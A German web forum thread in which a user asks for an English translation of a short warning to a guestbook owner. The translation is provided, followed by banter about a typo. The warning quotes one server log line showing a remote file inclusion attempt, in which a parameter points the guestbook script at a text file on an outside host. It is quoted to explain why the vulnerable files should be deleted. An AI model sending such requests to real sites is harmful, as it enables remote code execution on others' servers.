Shadowcrow: german2english

hi $name,
ich bräuchte jmd., der mir einen (kurzen) text ins englische übersetzt (technich), leider ist es wichtig, und meine eigenen fähigkeiten versage da.

gruss
shadow

--
If there's anything more important than my ego around, I want it caught and shot, now.
  1. hi,

    poste doch deinen txt hier!

    LG,
    Inita

    --
    Don't forget to love yourself.
  2. Hi,

    ich bräuchte jmd., der mir einen (kurzen) text ins englische übersetzt (technich), leider ist es wichtig, und meine eigenen fähigkeiten versage da.

    die Chance, dass sich jemand meldet, erhöht sich enorm, wenn Du diesen Text - zumal er kurz ist - einfach postest.

    Cheatah

    --
    X-Self-Code: sh:( fo:} ch:~ rl:° br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
    X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
    X-Will-Answer-Email: No
    X-Please-Search-Archive-First: Absolutely Yes
    1. hi $name,

      die Chance, dass sich jemand meldet, erhöht sich enorm wenn Du diesen Text - zumal er kurz ist - einfach postest.

      hast schon recht, here we go:

      Hallo richard,

      es reicht leider nicht die verlinkung der "comments.php" von der seite zu nehmen. wenn das gästebuch im standart verzeichnis installiert wurde / und oder es in den suchmaschinen auftaucht, wird es direkt aufgerufen.

      z.b.
      87.106.139.170 - - [04/Dec/2007:05:46:05 +0100] "GET /comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 1052 "-" "libwww-perl/5.805"

      bis zur schließung der lücke währe es besser, die beiden dateien zu löschen.

      gruss
      shadow

      --
      If there's anything more important than my ego around, I want it caught and shot, now.
      1. Hi,

        Hallo richard,

        es reicht leider nicht die verlinkung der "comments.php" von der seite zu nehmen. wenn das gästebuch im standart verzeichnis installiert wurde / und oder es in den suchmaschinen auftaucht, wird es direkt aufgerufen.

        z.b.
        87.106.139.170 - - [04/Dec/2007:05:46:05 +0100] "GET /comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 1052 "-" "libwww-perl/5.805"

        bis zur schließung der lücke währe es besser, die beiden dateien zu löschen.

        Hello Richard,

        it won't suffice to just remove the link to "comments.php" from the site (/document). If the guestbook has been installed into the default directory and/or is listed in serach engine result pages, it might get called directly.

        e.g.,
        87.106.139.170 [...]

        So until this flaw will be fixed, it'd be better to delete these two files from the web server.

        MfG ChrisB

        1. Hi,

          is listed in serach engine result pages

          ^^^

          Nee, nix mit Chorubim & Seraphim - das sollte natuerlich search engine heissen.

          MfG ChrisB

          1. hi $name,

            Hi,

            is listed in serach engine result pages
                            ^^^

            bexstaben verbuxelt

            gruss
            shadow

            --
            If there's anything more important than my ego around, I want it caught and shot, now.
          2. hi $name,

            Hi,

            is listed in serach engine result pages

            ^^^
            da fing mein wörterbuch an zu quengeln :-))

            gruss
            shadow

            --
            If there's anything more important than my ego around, I want it caught and shot, now.
          3. Hallo,

            is listed in serach ...
                            ^^^
            Nee, nix mit Chorubim & Seraphim - das sollte natuerlich search engine heissen.

            ach so ... ;-)
            Ich dachte schon, du meintest den Esslinger Stadtteil Serach.

            *scnr*
             Martin

            --
            Wer im Steinhaus sitzt, soll nicht mit Gläsern werfen.
        2. hi $name,

          danke 'kuß'

          gruss
          shadow

          --
          If there's anything more important than my ego around, I want it caught and shot, now.